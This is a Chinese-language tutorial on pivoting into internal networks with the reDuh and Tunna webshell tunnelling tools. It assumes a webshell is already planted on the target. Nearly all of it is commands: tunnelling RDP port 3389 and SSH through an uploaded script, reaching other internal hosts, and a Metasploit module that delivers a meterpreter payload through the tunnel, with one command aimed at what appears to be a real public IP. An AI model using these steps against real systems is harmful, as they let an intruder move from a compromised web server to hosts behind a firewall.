天天看点

内网穿透工具Tunna和reDuh

1.1reDuh

下载地址:https://github.com/sensepost/reDuh

1.reDuh使用条件

(1)获取目标服务器webshell,且可以上传reDuh服务端对应脚本文件。

(2)知道目标服务器开放的内网端口,如远程桌面的端口是3389。

(3)目标服务器网络做了端口策略限制,只允许外部访问内网的80等特定端口。

2. reDuh使用命令

(1)本地具备java环境,可以使用pentestbox自带java环境

java -jar reDuhClient.jar  http://somesite.com/reDuh.aspx http or https port

(2)本地连接1010端口

nc -vv localhost 1010

(3)在java命令窗口执行

[createTunnel]1234:127.0.0.1:3389

(4)使用mstsc登录127.0.0.1:1234

1.2Tunna

https://github.com/SECFORCE/Tunna

(1)连接3389

python proxy.py -u http://172.0.0.1/conn.aspx  -l 1234 -r 3389 –v

通过查看网上相关文章,只见conn.jsp和conn.php实现端口转发成功。

通过该方法访问内网的其他服务器,命令如下:

python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a 172.0.0.2 -r 3389

   172.0.0.1是webshell所在服务器,172.0.0.2是内网访问的服务器,3389为远程终端端口,有些服务器修改器默认端口为其它端口。本地直接登录远程终端地址127.0.0.1:1234即可。参数含义如下:

-l 表示本地监听的端口

-r 远程要转发的端口

-v 详细模式

2.连接SSH

对于SSH服务需要添加-s参数,才能保证连接的时候不会中断,执行命令:

python proxy.py -u http://218.4.45.152:8877/job/conn.aspx -l 1234 -r 22 -v –s

在本地使用ssh连接1234端口即可:

ssh localhost -p 1234

3.MSF利用tunna转发

将tunna_exploit.rb拷贝到msf的modules/exploits/windows/misc目录.

cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc

msf > use exploit/windows/misc/tunna_exploit

msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp

PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(tunna_exploit) > set RHOST 1.3.3.7  //注意这里是指本地的公网IP

RHOST => 1.3.3.7

msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp

TARGETURI => http://219.x.x.x:8080/conn.jsp

msf exploit(tunna_exploit) > set VERBOSE true

VERBOSE => true

msf exploit(tunna_exploit) > exploit –j

继续阅读